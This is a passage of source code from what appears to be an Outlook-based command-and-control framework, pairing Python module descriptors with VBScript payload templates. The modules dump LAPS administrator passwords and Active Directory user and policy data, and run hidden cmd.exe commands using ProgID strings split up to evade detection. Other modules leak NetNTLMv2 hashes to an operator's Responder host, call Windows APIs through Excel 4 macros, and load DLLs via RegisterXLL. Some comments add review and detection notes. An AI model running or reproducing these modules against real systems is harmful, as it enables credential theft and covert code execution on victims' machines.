Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
' Blank line between objects.
Returndata = Returndata & vbCrLf
Next
list_computers = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_domaininfo.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_domaininfo`` module: dump the ds_domaindns object(s)."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_domaininfo'
        self.depends = []
        # NOTE(review): the help text below mentions a "Domain option", but no
        # option is registered here, so the module takes no operator input.
        self.options = {}
        self.help = """
Enumerates Top level information from the specified domain in the Domain option.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_domaindns
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_domaininfo.txt
================================================
Function list_domaininfo()
' Dumps every property of the ds_domaindns object(s) returned by the local WMI
' namespace \root\directory\LDAP and returns the result as one string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: SELECT * FROM ds_domaindns" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_domaindns")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value: String, Long and Boolean
' are printed as name:value, arrays are joined with commas, everything else
' produces no output.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
' Blank line between objects.
Returndata = Returndata & vbCrLf
Next
list_domaininfo = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_lapspassword.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_lapspassword`` module: read LAPS attributes from computer objects."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_lapspassword'
        self.depends = []
        # This module takes no operator-supplied options.
        self.options = {}
        # The query named below reads DS_ms_Mcs_AdmPwd; what it returns is
        # bounded by who may read that attribute in the directory, so the
        # attribute's read permissions are the control to review.
        self.help = """
Enumerates the LAPS passwords in the current domain.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_lapspassword.txt
================================================
Function list_lapspassword()
' Reads DS_ms_Mcs_AdmPwd, DS_sAMAccountName and DS_ms_Mcs_AdmPwdExpirationTime
' from ds_computer objects where the password attribute is not NULL, and
' returns the values as one string.
' ConnectServer is called without credentials, so the result presumably
' reflects what the logged-on account is permitted to read; read access to
' this attribute is the directory permission to audit.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
' NOTE(review): the query text written to the report names only
' DS_ms_Mcs_AdmPwd, while the query executed on the next line selects three
' properties; the report line is not an exact record of what ran.
Returndata = Returndata & "Running query: " & "SELECT DS_ms_Mcs_AdmPwd FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value; types without a case
' below produce no output.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
' Boolean values are labelled with a "BOOL:" suffix after the property name.
Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
' Blank line between objects.
Returndata = Returndata & vbCrLf
Next
list_lapspassword = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_passwordnotrequired.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_passwordnotrequired`` module: users flagged as not requiring a password."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_passwordnotrequired'
        self.depends = []
        # This module takes no operator-supplied options.
        self.options = {}
        self.help = """
Enumerates all users from Active Directory that has the --Does not require password-- set.
It returns the sAMAccountName, ADSIPath and the useraccountcontrol value
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_passwordnotrequired.txt
================================================
Function list_passwordnotrequired()
' Reports Active Directory user accounts whose userAccountControl value has the
' PASSWD_NOTREQD bit set. The report is built up in Returndata and returned as
' one string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' userAccountControl bit 0x20: no password is required for the account.
Const PASSWD_NOTREQD = 32
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32" & vbCrLf
' The >= 32 comparison filters almost nothing (an ordinary enabled account is
' 512), so the query returns close to the whole user set and the selection is
' done by the bit test below.
Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "Long"
' And is bitwise on numeric operands, so this is the actual flag test.
' It runs for every Long-typed property of the object, not only for
' DS_userAccountControl - NOTE(review): any other Long property with this bit
' set would print the same account again.
if PASSWD_NOTREQD and pathAttribute.value Then
Returndata = Returndata & PATH.ADSIPath & vbCrLf
Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf
Returndata = Returndata & "PASSWD_NOTREQD enabled" & vbCrLf
Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf
Returndata = Returndata & vbCrLf
end if
End Select
Next
Next
' The accounts reported here are the ones an administrator would review when
' auditing this flag; the same bit test works for a defensive inventory.
list_passwordnotrequired = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_passwordpolicy.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_passwordpolicy`` module: read the domain password policy values."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_passwordpolicy'
        self.depends = []
        # This module takes no operator-supplied options.
        self.options = {}
        self.help = """
Enumerates the password policy from the current domain.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_passwordpolicy.txt
================================================
Function list_passwordpolicy()
' Reads the password and lockout policy properties of the ds_domaindns
' object(s) from the local WMI namespace \root\directory\LDAP and returns them
' as one string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value; types without a case
' below produce no output - NOTE(review): confirm which type the age and
' duration properties arrive as, since only the listed types are printed.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
' Boolean values are labelled with a "BOOL:" suffix after the property name.
Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
' Blank line between objects.
Returndata = Returndata & vbCrLf
Next
list_passwordpolicy = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_user.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_user`` module: look up one user account by sAMAccountName."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_user'
        self.depends = []
        self.help = """
Enumerates the user specified in the samaccountName option.
If user account is found it also enumerates the properties of the account.
If account not found it will say so in the returned data
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_user Where DS_sAMAccountName = VARIABLE
"""
        # The paired template concatenates this value into a WQL string literal.
        # quotedstring is the project's handler for it; its escaping rules are
        # not visible here - NOTE(review): confirm how it treats quote characters.
        self.options = {
            'samaccountname': {
                "value": None,
                "required": True,
                "description": "samaccountname to retreive information for",
                "handler": quotedstring,
            },
        }
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_user.txt
================================================
Function list_user()
' Looks up one user account by sAMAccountName in the local WMI namespace
' \root\directory\LDAP and returns its properties as text, or a "not found" line.
' {{samaccountname}} is a template placeholder filled in before the script runs.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
' The rendered value is concatenated into the WQL text between single quotes
' without any escaping in this function; a value containing a single quote
' would change the query - NOTE(review): check what the option handler emits.
Returndata = Returndata & "Running query: " & "SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'")
' Comparison binds tighter than Not, so this reads Not (count <= 0).
' NOTE(review): with errors suppressed, a failure while evaluating this
' condition is not handled explicitly; verify the output when the query fails.
if Not colItems.count <= 0 then
Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value: String, Long and Boolean
' are printed as name:value, arrays are joined with commas, everything else
' produces no output.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Next
else
Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf
end if
list_user = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_users.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``list_users`` module: list every user account name."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_users'
        self.depends = []
        # This module takes no operator-supplied options.
        self.options = {}
        self.help = """
Enumerates all users from Active Directory.
It returns the sAMAccountName
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_sAMAccountName FROM ds_user
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_users.txt
================================================
Function list_users()
' Lists the sAMAccountName of every ds_user object returned by the local WMI
' namespace \root\directory\LDAP and returns the result as one string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_user" & vbCrLf
' Unfiltered query: the result size grows with the number of user objects.
Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_user")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value: String, Long and Boolean
' are printed as name:value, arrays are joined with commas, everything else
' produces no output.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
' Blank line between objects.
Returndata = Returndata & vbCrLf
Next
list_users = Returndata
End Function
================================================
FILE: functions/execute/host/application.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
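class Spec(SpecModule):
    """Descriptor for the ``Execute_Application`` module: start a COM application by ProgID."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The svchost path in the help text used single backslashes ("\W", "\s"),
        # which are invalid escape sequences in a normal string literal. They are
        # doubled here; the resulting text is unchanged.
        # The parent-process detail in the text (svchost.exe -k DcomLaunch) is
        # also what process-creation telemetry would show for the started app.
        self.help = """
Executes the specified COM application hidden.
Application is specified setting the com_application option. It defaults to word.application.
Note that some of the applications starts and immmediatly terminates.
Typical application are:
- word.application
- excel.application
- powerpoint.application
- access.application
- oneNote.application
- publisher.application
Full list of objects can be found using this Powershell oneliner:
gci HKLM:\\Software\\Classes -ea 0| ? {$_.PSChildName -match '^\\w+\\.\\w+$' -and (gp "$($_.PSPath)\\CLSID" -ea 0)} | ft PSChildName
The executed application gets the parent pid of SVCHost.exe (C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p)
It uses CreateObject(Specified com application)
"""
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'Execute_Application'
        self.depends = []
        # quotedstring is the project's option handler; its behaviour is not
        # visible here.
        self.options['com_application'] = {
            "value": "word.application",
            "required": True,
            "description": "COM application to start",
            "handler": quotedstring,
        }
        super().__init__(templatepath)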
================================================
FILE: functions/execute/host/application.txt
================================================
Function Execute_Application()
' Creates the COM object named by the {{com_application}} template placeholder
' through Outlook's object model, hides its window and returns a status string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
Set app = window.external.OutlookApplication.CreateObject({{com_application}})
app.Visible = false
' The status text is returned unconditionally, so it does not show whether the
' object was actually created. The object is not closed or released here.
Execute_Application = "Command executed: OutlookApplication.CreateObject(" & {{com_application}} & ")"
End Function
================================================
FILE: functions/execute/host/capture_netntlmv2.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``capture_netntlmv2`` module: one HTTP GET to an operator-chosen URL."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'capture_netntlmv2'
        self.depends = []
        # What the text below describes depends on the client answering an NTLM
        # challenge from a remote server; restrictions on outgoing NTLM and
        # egress filtering are the controls that bear on it.
        self.help = """
This module makes a MSXML2.ServerXMLHTTP.6.0 Get request towards the URL specified in the URL option
and you need a responder listening on the address to capture the hash.
Lets say you want to send the client to https://hashcapture.com
set webserver_address hashcapture.com
set url https://hashcapture.com
run
This should give you the netNTLMv2 hash in Responder
If you are able to enable LM/netNTLMv1 support in the OS this can also be used to capture that.
It uses MSXML2.ServerXMLHTTP.6.0
- SetProxy
- setRequestHeader
- open
- send
"""
        # Insertion order matches the original: webserver_address, url, useragent.
        self.options = {
            'webserver_address': {
                "value": None,
                "required": True,
                "description": "Main FQDN/IP of the server without HTTP/HTTPS - ex hashcapture.com",
                "handler": quotedstring,
            },
            'url': {
                "value": None,
                "required": True,
                "description": "Full url - ex https://hashcapture.com",
                "handler": quotedstring,
            },
            # Not set by the operator; preprocess() fills it in per agent.
            'useragent': {
                "value": None,
                "required": False,
                "description": "Useragent - Retrieved from DB",
                "handler": quotedstring,
            },
        }
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Copy ``agent.useragent`` into the ``useragent`` option value.

        Args:
            agent: Object exposing a ``useragent`` attribute.
        """
        stored_useragent = agent.useragent
        self.options['useragent']['value'] = stored_useragent
================================================
FILE: functions/execute/host/capture_netntlmv2.txt
================================================
Function capture_netntlmv2()
' Sends one synchronous HTTP GET to the {{ url }} placeholder with
' MSXML2.ServerXMLHTTP.6.0 created through Outlook's object model.
' The function never assigns its own name, so it returns no data.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
Set oHTTP = window.external.OutlookApplication.CreateObject("MSXML2.ServerXMLHTTP.6.0")
' Proxy setting 2 selects an explicitly named proxy server; the third argument
' is the bypass list.
oHTTP.SetProxy 2, {{ webserver_address }}, "*"
' NOTE(review): the header is set before open(); MSXML documents
' setRequestHeader as valid only after open(), so this call presumably fails
' silently here and the request goes out with the component's default
' User-Agent - verify before keying a network detection on the configured value.
oHTTP.setRequestHeader "User-Agent", {{ useragent }}
' False = synchronous request.
oHTTP.open "GET", {{ url }}, False
oHTTP.send
End Function
================================================
FILE: functions/execute/host/cmd.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``Execute_CMD`` module: run one command line through cmd.exe."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        # NOTE(review): unlike the sibling modules, this one does not set
        # self.depends; whether the base class supplies a default is not visible here.
        self.entry = 'Execute_CMD'
        self.help = """
Execute a command via cmd.exe and print any output to the agent log file.
Uses the cmd /c prefix
It uses Wscript.shell
- Run
It uses Scripting.FileSystemObject
- OpenTextFile
- FileExists
- GetSpecialFolder
- GetTempname
- DeleteFile
"""
        # quotedstring is the project's option handler; its behaviour is not
        # visible here.
        self.options = {
            'command': {
                "value": None,
                "required": True,
                "description": "Command to execute on remote target",
                "handler": quotedstring,
            },
        }
        super().__init__(templatepath)
================================================
FILE: functions/execute/host/cmd.txt
================================================
Function Execute_CMD()
' Runs "cmd /c <command> > <temp file>" in a hidden window, waits for it to
' finish, reads the temp file back and returns its content together with the
' command line. {{command}} is a template placeholder.
' Observable side effects visible in this code: a cmd.exe process whose command
' line ends in a redirection to a file in the temporary folder, and that file
' being created, read and deleted.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
' Declared but not referenced; the Run call below passes a literal 0.
Const HIDDEN_WINDOW = 0
' Both ProgIDs are assembled from string fragments ("Wscript.shell" and
' "Scripting.FileSystemObject"), so a search of the script text for the full
' ProgID does not match; content rules need to account for the split form.
Set ws = window.external.OutlookApplication.CreateObject("Wscr" & "ipt.s" & "hell")
Set f = window.external.OutlookApplication.CreateObject("Scri" & "pting.FileSyst" & "emObject")
' Special folder 2 is the temporary folder; GetTempName only generates a name.
tmp = f.GetSpecialFolder(2)
fn = f.GetTempName
ff = tmp & "\" & fn
' Only standard output is redirected; the temp path is appended unquoted.
c = "cmd /c " & {{command}} & " > " & ff
' Window style 0 (hidden), wait for completion (true).
ws.Run c, 0, true
' If the output file does not exist, the function returns nothing at all.
if f.FileExists(ff) then
set tf = f.OpenTextFile(ff)
if not tf.atendofstream then
retval = tf.ReadAll
tf.close()
Execute_CMD = "Command executed: " & c & vbCrLf & retval
else
tf.close()
Execute_CMD = "Command: " & c & " returned no data"
end if
' The output file is removed after it has been read.
f.DeleteFile ff
end if
End Function
================================================
FILE: functions/execute/host/execute_excel4macro.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``execute_excel4macro`` module: pass a CALL() expression to Excel."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'execute_excel4macro'
        self.depends = []
        self.help = """
This module spawns a new instance of excel and executes ExecuteExcel4Macro to execute provided call.
ExecuteExcel4Macro("CALL(INPUT)")
Example calling Windows API using INPUT:
- set input ""Kernel32"",""GetTickCount"",""J""
- set input ""user32"",""SetCursorPos"",""JJJ"",1,2
Info about the datatypes (J)
B - 8-byte floating-point number (IEEE), Transferred by Value, C type double.
C - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference, C type char *
F - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference (modify in place), C type char *
J - 4 bytes wide signed integer, Transferred by Value, C type long int
P - Excel's OPER data structure, Transferred by Reference, C type OPER *
R - Excel's XLOPER data structure, Transferred by Reference, C type XLOPER *
It uses the excel application
- ExecuteExcel4Macro
"""
        # quotedstring is the project's option handler; how its output combines
        # with the quoting already present in the template is not visible here.
        self.options = {
            'input': {
                "value": None,
                "required": True,
                "description": "What to execute, remember two double quotes around parameters, see help!",
                "handler": quotedstring,
            },
        }
        super().__init__(templatepath)
================================================
FILE: functions/execute/host/execute_excel4macro.txt
================================================
Function execute_excel4macro()
' Creates an Excel.Application object through Outlook's object model, hides it,
' evaluates one Excel 4.0 macro CALL() expression built from the {{input}}
' template placeholder and returns the result as text.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
Set excel = window.external.OutlookApplication.CreateObject("Excel.Application")
excel.Visible = false
' The placeholder is substituted inside the string literal, so its rendered
' form must already be valid inside double quotes.
return_data = excel.ExecuteExcel4Macro("CALL({{input}})")
' The Excel object is never told to quit in this function, so the hidden
' instance presumably keeps running afterwards - NOTE(review): confirm; a
' windowless Excel process is a host artifact of this module.
execute_excel4macro = "Data returned: " & return_data
End Function
================================================
FILE: functions/execute/host/execute_registerxll.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Descriptor for the ``execute_registerxll`` module: load an XLL file through Excel."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'execute_registerxll'
        self.depends = []
        # Per the text below the file may carry any extension, so a file-name
        # pattern alone does not identify what Excel is asked to load.
        self.help = """
This module runs the registerxll function in excel, allowing you to execute a DLL(XLL).
XLL file must be on disk, does not work over http. The XLL can be named whatever as extension. (or nothing at all)
For tips on how to create a XLL you can go here:
https://learn.microsoft.com/en-us/office/client-developer/excel/creating-xlls
It uses the excel application
- Registerxll
"""
        # quotedstring is the project's option handler; its behaviour is not
        # visible here.
        self.options = {
            'input': {
                "value": None,
                "required": True,
                "description": "Path to xll file on disk",
                "handler": quotedstring,
            },
        }
        super().__init__(templatepath)
================================================
FILE: functions/execute/host/execute_registerxll.txt
================================================
Function execute_registerxll()
' Creates an Excel.Application object through Outlook's object model, hides it
' and calls RegisterXLL with the path from the {{input}} template placeholder.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
Set excel = window.external.OutlookApplication.CreateObject("Excel.Application")
excel.Visible = false
' RegisterXLL makes Excel load the named file as an add-in library.
return_data = excel.RegisterXLL({{input}})
' The returned text carries RegisterXLL's result value; "XLL Executed" is
' printed regardless of that value. The Excel object is never told to quit in
' this function, so the hidden instance presumably keeps running afterwards -
' NOTE(review): confirm; module loads into that Excel process are the artifact.
execute_registerxll = "XLL Executed: " & return_data
End Function
================================================
FILE: functions/execute/host/migrate_homepage.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
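class Spec(SpecModule):
    """Descriptor for the ``Execute_MigrateHomepage`` module: rewrite the Outlook home page URL."""

    def __init__(self, templatepath, helpers):
        """Register help text, entry point, dependency and options, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # "root\cimv2" in the help text used a single backslash ("\c"), which is
        # an invalid escape sequence in a normal string literal. It is doubled
        # here; the resulting text is unchanged.
        self.help = """
Migrate agent to another Specula server.
This module sets the URL to a new Specula server.
Useful in situations when you want to change host.
It does NOT move the encrytion key so you must point to the validation url.
!!Remember to have the other server up and running!!
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).CreateKey
- ConnectServer(root\\cimv2).SetStringValue
- ConnectServer(root\\cimv2).SetDWORDValue
"""
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'Execute_MigrateHomepage'
        # Helper template that provides the registry write used by the paired
        # template (SetRegValue_HKCU).
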